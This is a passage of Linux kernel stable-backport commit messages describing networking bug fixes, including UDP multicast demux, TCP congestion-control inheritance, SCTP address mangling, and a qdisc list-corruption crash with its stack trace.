coherent dma memory is being allocated using either dma_alloc_coherent()
or the deprecated pci_alloc_consistent(). All these calls should be
changed to use dma_zalloc_coherent() to avoid uninitialized fields in
data structures backed by this memory.

Reported-by: Joerg Roedel <jroedel@suse.de>
Tested-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Sriharsha Basavapatna <sriharsha.basavapatna@avagotech.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ipv4/udp: Verify multicast group is ours in upd_v4_early_demux()

[ Upstream commit 6e540309326188f769e03bb4c6dd8ff6752930c2 ]

421b3885bf6d56391297844f43fb7154a6396e12 "udp: ipv4: Add udp early
demux" introduced a regression that allowed sockets bound to INADDR_ANY
to receive packets from multicast groups that the socket had not joined.
For example a socket that had joined 224.168.2.9 could also receive
packets from 225.168.2.9 despite not having joined that group if
ip_early_demux is enabled.

Fix this by calling ip_check_mc_rcu() in udp_v4_early_demux() to verify
that the multicast packet is indeed ours.

Signed-off-by: Shawn Bohrer <sbohrer@rgmadvisors.com>
Reported-by: Yurij M. Plotnikov <Yurij.Plotnikov@oktetlabs.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

xen: netback: read hotplug script once at start of day.

[ Upstream commit 31a418986a5852034d520a5bab546821ff1ccf3d ]

When we come to tear things down in netback_remove() and generate the
uevent it is possible that the xenstore directory has already been
removed (details below).

In such cases netback_uevent() won't be able to read the hotplug
script and will write a xenstore error node.

A recent change to the hypervisor exposed this race such that we now
sometimes lose it (where apparently we didn't ever before).

Instead read the hotplug script configuration during setup and use it
for the lifetime of the backend device.

The apparently more obvious fix of moving the transition to
state=Closed in netback_remove() to after the uevent does not work
because it is possible that we are already in state=Closed (in
reaction to the guest having disconnected as it shutdown). Being
already in Closed means the toolstack is at liberty to start tearing
down the xenstore directories. In principal it might be possible to
arrange to unregister the device sooner (e.g on transition to Closing)
such that xenstore would still be there but this state machine is
fragile and prone to anger...

A modern Xen system only relies on the hotplug uevent for driver
domains, when the backend is in the same domain as the toolstack it
will run the necessary setup/teardown directly in the correct sequence
wrt xenstore changes.

Signed-off-by: Ian Campbell <ian.campbell@citrix.com>
Acked-by: Wei Liu <wei.liu2@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

tcp: fix child sockets to use system default congestion control if not set

[ Upstream commit 9f950415e4e28e7cfae2e416b43e862e8101d996 ]

Linux 3.17 and earlier are explicitly engineered so that if the app
doesn't specifically request a CC module on a listener before the SYN
arrives, then the child gets the system default CC when the connection
is established. See tcp_init_congestion_control() in 3.17 or earlier,
which says "if no choice made yet assign the current value set as
default". The change ("net: tcp: assign tcp cong_ops when tcp sk is
created") altered these semantics, so that children got their parent
listener's congestion control even if the system default had changed
after the listener was created.

This commit returns to those original semantics from 3.17 and earlier,
since they are the original semantics from 2007 in 4d4d3d1e8 ("[TCP]:
Congestion control initialization."), and some Linux congestion
control workflows depend on that.

In summary, if a listener socket specifically sets TCP_CONGESTION to
"x", or the route locks the CC module to "x", then the child gets
"x". Otherwise the child gets current system default from
net.ipv4.tcp_congestion_control. That's the behavior in 3.17 and
earlier, and this commit restores that.

Fixes: 55d8694fa82c ("net: tcp: assign tcp cong_ops when tcp sk is created")
Cc: Florian Westphal <fw@strlen.de>
Cc: Daniel Borkmann <dborkman@redhat.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Cc: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

udp: fix behavior of wrong checksums

[ Upstream commit beb39db59d14990e401e235faf66a6b9b31240b0 ]

We have two problems in UDP stack related to bogus checksums :

1) We return -EAGAIN to application even if receive queue is not empty.
This breaks applications using edge trigger epoll()

2) Under UDP flood, we can loop forever without yielding to other
processes, potentially hanging the host, especially on non SMP.

This patch is an attempt to make things better.

We might in the future add extra support for rt applications
wanting to better control time spent doing a recv() in a hostile
environment. For example we could validate checksums before queuing
packets in socket receive queue.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

bridge: fix br_multicast_query_expired() bug

[ Upstream commit 71d9f6149cac8fc6646adfb2a6f3b0de6ddd23f6 ]

br_multicast_query_expired() querier argument is a pointer to
a struct bridge_mcast_querier :

struct bridge_mcast_querier {
struct br_ip addr;
struct net_bridge_port __rcu *port;
};

Intent of the code was to clear port field, not the pointer to querier.

Fixes: 2cd4143192e8 ("bridge: memorize and export selected IGMP/MLD querier port")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Thadeu Lima de Souza Cascardo <cascardo@redhat.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Cc: Linus Lüssing <linus.luessing@web.de>
Cc: Steinar H. Gunderson <sesse@samfundet.no>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

sctp: Fix mangled IPv4 addresses on a IPv6 listening socket

[ Upstream commit 9302d7bb0c5cd46be5706859301f18c137b2439f ]

sctp_v4_map_v6 was subtly writing and reading from members
of a union in a way the clobbered data it needed to read before
it read it.

Zeroing the v6 flowinfo overwrites the v4 sin_addr with 0, meaning
that every place that calls sctp_v4_map_v6 gets ::ffff:0.0.0.0 as the
result.

Reorder things to guarantee correct behaviour no matter what the
union layout is.

This impacts user space clients that open an IPv6 SCTP socket and
receive IPv4 connections. Prior to 299ee user space would see a
sockaddr with AF_INET and a correct address, after 299ee the sockaddr
is AF_INET6, but the address is wrong.

Fixes: 299ee123e198 (sctp: Fixup v4mapped behaviour to comply with Sock API)
Signed-off-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

net_sched: invoke ->attach() after setting dev->qdisc

[ Upstream commit 86e363dc3b50bfd50a1f315934583fbda673ab8d ]

For mq qdisc, we add per tx queue qdisc to root qdisc
for display purpose, however, that happens too early,
before the new dev->qdisc is finally set, this causes
q->list points to an old root qdisc which is going to be
freed right before assigning with a new one.

Fix this by moving ->attach() after setting dev->qdisc.

For the record, this fixes the following crash:

------------[ cut here ]------------
WARNING: CPU: 1 PID: 975 at lib/list_debug.c:59 __list_del_entry+0x5a/0x98()
list_del corruption. prev->next should be ffff8800d1998ae8, but was 6b6b6b6b6b6b6b6b
CPU: 1 PID: 975 Comm: tc Not tainted 4.1.0-rc4+ #1019
Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
  0000000000000009 ffff8800d73fb928 ffffffff81a44e7f 0000000047574756
  ffff8800d73fb978 ffff8800d73fb968 ffffffff810790da ffff8800cfc4cd20
  ffffffff814e725b ffff8800d1998ae8 ffffffff82381250 0000000000000000
Call Trace:
  [<ffffffff81a44e7f>] dump_stack+0x4c/0x65
  [<ffffffff810790da>] warn_slowpath_common+0x9c/0xb6
  [<ffffffff814e725b>] ? __list_del_entry+0x5a/0x98
  [<ffffffff81079162>] warn_slowpath_fmt+0x46/0x48
  [<ffffffff81820eb0>] ? dev_graft_qdisc+0x5e/0x6a
  [<ffffffff814e725b>] __list_del_entry+0x5a/0x98
  [<ffffffff814e72a7>] list_del+0xe/0x2d
  [<ffffffff81822f05>] qdisc_list_del+0x1e/0x20
  [<ffffffff81820cd1>] qdisc_destroy+0x30/0xd6
  [<ffffffff81822676>] qdisc_graft+0x11d/0x243
  [<ffffffff818233c1>] tc_get_qdisc+0x1a6/0x1d4
  [<ffffffff810b5eaf>] ? mark_lock+0x2e/0x226
  [<ffffffff817ff8f5>] rtnetlink_rcv_msg+0x181/0x194
  [<ffffffff817ff72e>] ? rtnl_lock+0x17/0x19
  [<ffffffff817ff72e>] ? rtnl_lock+0x17/0x19
  [<ffffffff817ff774>] ? __rtnl_unlock+0x17/0x17
  [<ffffffff81855dc6>] netlink_rcv_skb+0x4d/0x93
  [<ffffffff817ff756>] rtnetlink_rcv+0x26/0x2d
  [<ffffffff818544b2>] netlink_unicast+0xcb/0x150
  [<ffffffff81161db9>] ? might_fault+0x59/0xa9
  [<ffffffff81854f78>] netlink_sendmsg+0x4fa/0x51c
  [<ffffffff817d6e09>] sock_sendmsg_nosec+0x12/0x1d
  [<ffffffff817d8967>] sock_sendmsg+0x29/0x2e
  [<ffffffff817d8cf3>] ___sys_sendmsg+0x1b4/0x23a
  [<ffffffff8100a1b8>] ? native_sched_clock+0x35/0x37
  [<ffffffff810a1d83>] ? sched_clock_local+0x12/0x72
  [<ffffffff810a1fd4>] ? sched_clock_cpu+0x9e/0xb7
  [<ffffffff810def2a>] ? current_kernel_time+0xe/0x32
  [<ffffffff810b4bc5>] ? lock_release_holdtime.part.29+0x71/0x7f
  [<ffffffff810ddebf>] ? read_seqcount_begin.constprop.27+0x5f/0x76
  [<ffffffff810b6292>] ? trace_hardirqs_on_caller+0x17d/0x199
  [<ffffffff811b14d5>] ? __fget_light+0x50/0x78
  [<ffffffff817d9808>] __sys_sendmsg+0x42/0x60
  [<ffffffff817d9838>] SyS_sendmsg+0x12/0x1c
  [<ffffffff81a50e97>] system_call_fastpath+0x12/0x6f
---[ end trace ef29d3fb28e97ae7 ]---

For long term, we probably need to clean up the qdisc_graft() code
in case it hides other bugs like this.

Fixes: 95dc19299f74 ("pkt_sched: give visibility to mq slave qdiscs")
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>